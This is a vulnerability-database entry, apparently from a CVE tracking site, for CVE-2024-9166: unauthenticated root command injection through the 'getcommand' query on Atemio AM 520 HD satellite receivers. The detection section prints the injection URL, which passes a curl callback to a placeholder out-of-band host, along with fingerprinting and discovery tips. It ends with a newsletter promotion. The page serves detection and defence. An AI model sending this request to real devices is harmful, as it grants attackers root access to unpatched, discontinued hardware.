cbcvebase.
CVE-2024-9166
published 2024-09-26

CVE-2024-9166: The device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the…

PriorityP267critical9.3CVSS 4.0
AVNACLATNPRNUINVCHVIHVAHSCNSINSANEXCRXIRXARXMAVXMACXMATXMPRXMUIXMVCXMVIXMVAXMSCXMSIXMSAXSXAUXRXVXREXUX
EXPLOIT
EPSS
1.51%
71.3th percentile
The device enables an unauthorized attacker to execute system commands with elevated privileges. This exploit is facilitated through the use of the 'getcommand' query within the application, allowing the attacker to gain root access.

Affected

1 ranges
VendorProductVersion rangeFixed in
atelmoatemio_am_520_hd_full_hd_satellite_receiver<= TitanNit 2.01

Detection & IOCsextracted from sources · hover to see the quote

url/query?getcommand=&cmd=curl+http://{{interactsh-url}}
path/query
  • Detect exploitation attempts by monitoring HTTP GET requests to the /query endpoint containing the 'getcommand' parameter, especially combined with a 'cmd' parameter carrying shell commands.
  • Responses from a vulnerable TitanNit Web Control device will contain 'titan.css' in the body; use this as a fingerprint to confirm the target is a TitanNit device.
  • Use FOFA or similar asset-discovery tools to identify exposed TitanNit Web Control instances by searching for the page title 'TitanNit Web Control'.
  • The exploit is unauthenticated (no credentials required) and requires only a single crafted GET request; alert on any external/internet-sourced request to /query?getcommand= on ICS/satellite-receiver devices.
  • ·The vulnerable parameter is 'getcommand' within the /query endpoint; the injected command is passed via the 'cmd' query parameter. Both parameters must be present in the request for the injection to trigger.
  • ·Affected product (Atemio AM 520 HD running TitanNit 2.01 and prior) has been discontinued by the vendor with no patch available; no service or support addresses can be contacted.
  • ·The Nuclei template uses an out-of-band (OAST/interactsh) callback to confirm code execution; detections relying solely on response body may miss blind RCE cases where the command output is not reflected.
CVEs like this are exactly what “Exploited This Week” covers.

Every Monday: what got weaponized or added to CISA KEV in the last seven days — each CVE cross-linked to its PoC, Nuclei template, and detection rule. Free, one email a week, unsubscribe in one click.